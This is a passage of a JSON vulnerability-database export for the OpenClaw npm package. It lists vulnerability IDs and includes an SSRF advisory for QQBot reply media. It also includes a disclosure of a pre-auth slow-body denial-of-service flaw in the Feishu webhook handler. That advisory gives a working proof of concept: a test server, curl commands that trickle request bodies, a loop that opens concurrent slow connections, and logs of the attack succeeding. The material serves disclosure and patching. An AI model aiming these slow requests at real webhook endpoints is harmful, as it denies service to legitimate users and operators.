ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5dj5-mk23-kyds"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-66nc-bn98-nbas"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-acy1-83py-efhr"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-utv2-tyje-kfht"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vv2u-u7mn-rfe1"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.24"}],"aliases":["CVE-2026-33581","GHSA-v8wv-jg3q-qwpq"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-9jjv-aa8k-rke1"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89809?format=json","vulnerability_id":"VCID-9kgh-wj9w-ykff","summary":"OpenClaw: QQBot reply media URL handling could trigger SSRF and re-upload fetched bytes\n## Summary\n\nQQBot reply media URL handling could trigger SSRF and re-upload fetched bytes.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `< 2026.4.12`\n- Patched versions: `>= 2026.4.12`\n\n## Impact\n\nQQBot reply media URLs could be treated as trusted media sources, allowing SSRF fetches whose returned bytes were then re-uploaded through the channel.\n\n## Technical Details\n\nThe fix routes QQBot remote media fetches through SSRF-guarded media fetching and explicit URL allowlist policy.\n\n## Fix\n\nThe issue was fixed in #63495 and #65788. The first stable tag containing the fix is `v2026.4.12`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `08ae021d1f4f02e0ca5fd8a3b9659291c1ecf95a`\n- `ddb7a8dd80b8d5dd04aafa44ce7a4354b568bb2d`\n- PR: #63495, #65788\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.12 or newer. The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @threalwinky for reporting this issue.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-43526","reference_id":"","reference_type":"","scores":[{"value":"0.00041","scoring_system":"epss","scoring_elements":"0.12834","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00045","scoring_system":"epss","scoring_elements":"0.14131","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00045","scoring_system":"epss","scoring_elements":"0.14168","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-43526"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/08ae021d1f42905a85a550813c0d95169b171a6c","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/08ae021d1f42905a85a550813c0d95169b171a6c"},{"reference_url":"https://github.com/openclaw/openclaw/commit/08ae021d1f4f02e0ca5fd8a3b9659291c1ecf95a","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-05T12:24:17Z/"}],"url":"https://github.com/openclaw/openclaw/commit/08ae021d1f4f02e0ca5fd8a3b9659291c1ecf95a"},{"reference_url":"https://github.com/openclaw/openclaw/commit/ddb7a8dd80b8d5dd04aafa44ce7a4354b568bb2d","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-05T12:24:17Z/"}],"url":"https://github.com/openclaw/openclaw/commit/ddb7a8dd80b8d5dd04aafa44ce7a4354b568bb2d"},{"reference_url":"https://github.com/openclaw/openclaw/pull/63495","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/pull/63495"},{"reference_url":"https://github.com/openclaw/openclaw/pull/65788","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/pull/65788"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-2767-2q9v-9326","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-05T12:24:17Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-2767-2q9v-9326"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-43526","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-43526"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-server-side-request-forgery-via-qqbot-reply-media-url-handling","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-05T12:24:17Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-server-side-request-forgery-via-qqbot-reply-media-url-handling"},{"reference_url":"https://github.com/advisories/GHSA-2767-2q9v-9326","reference_id":"GHSA-2767-2q9v-9326","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-2767-2q9v-9326"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/110264?format=json","purl":"pkg:npm/openclaw@2026.4.12","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-6cfj-zugb-7uhq"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-h9a4-1twb-d7d1"},{"vulnerability":"VCID-hphn-8fnj-qkh2"},{"vulnerability":"VCID-hy24-6xpe-pkb7"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.12"}],"aliases":["CVE-2026-43526","GHSA-2767-2q9v-9326"],"risk_score":3.8,"exploitability":"0.5","weighted_severity":"7.5","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-9kgh-wj9w-ykff"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90871?format=json","vulnerability_id":"VCID-9pj9-7b12-jbea","summary":"OpenClaw has incomplete Fix for CVE-2026-32011: Feishu Webhook Pre-Auth Body Parsing DoS (Slow-Body / Slowloris Variant)\n> Fixed in OpenClaw 2026.3.24, the current shipping release.\n\n# Advisory Details\n\n**Title**: Incomplete Fix for CVE-2026-32011: Feishu Webhook Pre-Auth Body Parsing DoS (Slow-Body / Slowloris Variant)\n\n**Description**:\n\n### Summary\n\nThe patch for CVE-2026-32011 tightened pre-auth body parsing limits (from 1MB/30s to 64KB/5s) across several webhook handlers. However, the **Feishu extension's webhook handler** was not included in the patch and still accepts request bodies with the old permissive limits (1MB body, 30-second timeout) **before** verifying the webhook signature. An unauthenticated attacker can exhaust server connection resources by sending concurrent slow HTTP POST requests to the Feishu webhook endpoint.\n\n### Details\n\nIn `extensions/feishu/src/monitor.ts`, the webhook HTTP handler uses `installRequestBodyLimitGuard` with permissive limits at lines 276-278:\n\n```typescript\nconst FEISHU_WEBHOOK_MAX_BODY_BYTES = 1024 * 1024;    // 1MB (line 26)\nconst FEISHU_WEBHOOK_BODY_TIMEOUT_MS = 30_000;         // 30s (line 27)\n\n// ... in monitorWebhook(), line 276-278:\nconst guard = installRequestBodyLimitGuard(req, res, {\n  maxBytes: FEISHU_WEBHOOK_MAX_BODY_BYTES,    // 1MB\n  timeoutMs: FEISHU_WEBHOOK_BODY_TIMEOUT_MS,  // 30s\n  responseFormat: \"text\",\n});\n```\n\nThe body guard is installed at line 276 **before** the request reaches the Lark SDK's `adaptDefault` webhook handler (line 284), which performs signature verification. This means:\n\n1. Any unauthenticated HTTP POST is accepted\n2. The server waits up to 30 seconds for the body to arrive\n3. Each connection can buffer up to 1MB\n4. Authentication only happens after the body is fully read\n\nThe patched handlers (Mattermost, MSTeams, Google Chat, etc.) now use tight pre-auth limits:\n```typescript\nconst PREAUTH_MAX_BODY_BYTES = 64 * 1024;     // 64KB\nconst PREAUTH_BODY_TIMEOUT_MS = 5_000;         // 5s\n```\n\nThe Feishu extension was missed because it resides in `extensions/feishu/` (a plugin workspace) rather than in the core `src/` directory.\n\n**Attack chain:**\n```\n[Attacker sends slow HTTP POST to /feishu/events]\n  → Rate limit check: passes (under 120 req/min)\n  → Content-Type check: application/json, passes\n  → installRequestBodyLimitGuard(1MB, 30s): installed\n  → Body trickles at 1 byte/sec for 30 seconds\n  → × 50 concurrent connections = connection exhaustion\n  → Legitimate Feishu webhook deliveries blocked\n```\n\n### PoC\n\n**Prerequisites:** Docker installed.\n\n**Step 1:** Create a minimal test server reproducing the vulnerable body parsing:\n\n```bash\ncat > /tmp/feishu_webhook_server.js << 'EOF'\nconst http = require(\"http\");\nconst VULN_TIMEOUT = 30_000;   // Vulnerable: 30s (same as Feishu handler)\nconst PATCH_TIMEOUT = 5_000;   // Patched: 5s (what it should be)\n\nfunction bodyGuard(req, res, timeoutMs) {\n  let done = false;\n  const timer = setTimeout(() => {\n    if (!done) { done = true; res.statusCode = 408; res.end(\"Request body timeout\"); req.destroy(); }\n  }, timeoutMs);\n  req.on(\"end\", () => { done = true; clearTimeout(timer); });\n  req.on(\"close\", () => { done = true; clearTimeout(timer); });\n}\n\nhttp.createServer((req, res) => {\n  if (req.url === \"/healthz\") { res.end(\"OK\"); return; }\n  if (req.method !== \"POST\") { res.writeHead(405); res.end(); return; }\n  const timeout = req.url === \"/feishu/events\" ? VULN_TIMEOUT : PATCH_TIMEOUT;\n  console.log(`[${req.url}] +conn`);\n  bodyGuard(req, res, timeout);\n  res.on(\"finish\", () => console.log(`[${req.url}] -conn`));\n}).listen(3000, () => console.log(\"Listening on :3000\"));\nEOF\nnode /tmp/feishu_webhook_server.js &\nsleep 1\n```\n\n**Step 2:** Verify the vulnerability — slow body holds connection for the full timeout:\n\n```bash\n# Vulnerable endpoint: connection stays open for ~10 seconds (max 30s)\ntime (echo -n '{\"t\":\"'; sleep 10; echo '\"}') | \\\n  curl -s -o /dev/null -w \"status: %{http_code}\\n\" \\\n  -X POST http://localhost:3000/feishu/events \\\n  -H \"Content-Type: application/json\" \\\n  -H \"Content-Length: 65536\" \\\n  --data-binary @- --max-time 35\n\n# Patched endpoint: connection terminated after ~5s\ntime (echo -n '{\"t\":\"'; sleep 10; echo '\"}') | \\\n  curl -s -o /dev/null -w \"status: %{http_code}\\n\" \\\n  -X POST http://localhost:3000/patched/events \\\n  -H \"Content-Type: application/json\" \\\n  -H \"Content-Length: 65536\" \\\n  --data-binary @- --max-time 35\n```\n\n**Step 3:** Batch exploit — 10 concurrent slow connections:\n\n```bash\nfor i in $(seq 1 10); do\n  (echo -n 'A'; sleep 15) | \\\n    curl -s -o /dev/null -X POST http://localhost:3000/feishu/events \\\n    -H \"Content-Type: application/json\" \\\n    -H \"Content-Length: 65536\" \\\n    --data-binary @- --max-time 35 &\ndone\nwait\n```\n\n### Log of Evidence\n\n**Exploit result (vulnerable /feishu/events):**\n```\n=== Feishu Webhook Pre-Auth Slow-Body DoS ===\nTarget: localhost:3000/feishu/events\nConcurrent connections: 10\n\n  [conn-0] held open for 15.0s (15B sent) [SUCCESS]\n  [conn-1] held open for 15.0s (15B sent) [SUCCESS]\n  [conn-2] held open for 15.0s (15B sent) [SUCCESS]\n  [conn-3] held open for 15.0s (15B sent) [SUCCESS]\n  [conn-4] held open for 15.0s (15B sent) [SUCCESS]\n  [conn-5] held open for 15.0s (15B sent) [SUCCESS]\n  [conn-6] held open for 15.0s (15B sent) [SUCCESS]\n  [conn-7] held open for 15.0s (15B sent) [SUCCESS]\n  [conn-8] held open for 15.0s (15B sent) [SUCCESS]\n  [conn-9] held open for 15.0s (15B sent) [SUCCESS]\n\n=== Results ===\nConnections held open (SUCCESS): 10/10\n[SUCCESS] Pre-auth slow-body DoS confirmed!\n```\n\n**Control result (patched /patched/events with 5s timeout):**\n```\n=== CONTROL: Patched Webhook Body Limits (64KB/5s) ===\nTarget: localhost:3000/patched/events\n\n  [conn-0] RESET after 8.0s (8B)\n  [conn-1] RESET after 8.0s (8B)\n  ...\n  [conn-9] RESET after 8.0s (8B)\n\nAvg connection hold time: 8.0s (5s timeout + stagger delay)\n```\n\n**Server-side Docker logs confirming the discrepancy:**\n```\n[feishu-vulnerable] +conn (active: 1)\n[feishu-vulnerable] +conn (active: 10)  ← No disconnections during 15s attack\n[patched-control] +conn (active: 20)\n[patched-control] -conn after 5.0s (active: 19)  ← ALL terminated at 5s\n[patched-control] -conn after 5.0s (active: 10)\n```\n\n### Impact\n\nAn unauthenticated attacker can cause a **Denial of Service** against any OpenClaw instance running the Feishu channel in webhook mode. The Feishu webhook endpoint must be publicly accessible for Feishu to deliver webhooks, so the attacker can directly target it.\n\nWith ~50 concurrent slow HTTP connections (each trickling 1 byte/second), the attacker can:\n- Exhaust the server's connection handling capacity for 30 seconds per wave\n- Block legitimate Feishu webhook deliveries (messages not reaching the bot)\n- Consume up to 50MB of memory (50 × 1MB buffer) per attack wave\n\nThe attack is trivial — it only requires sending slow HTTP POST requests. No valid Feishu webhook signature or any other credentials are needed.\n\n### Affected products\n- **Ecosystem**: npm\n- **Package name**: openclaw\n- **Affected versions**: <= 2026.2.22\n- **Patched versions**: None\n\n### Severity\n- **Severity**: Medium\n- **Vector string**: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L\n\n### Weaknesses\n- **CWE**: CWE-400: Uncontrolled Resource 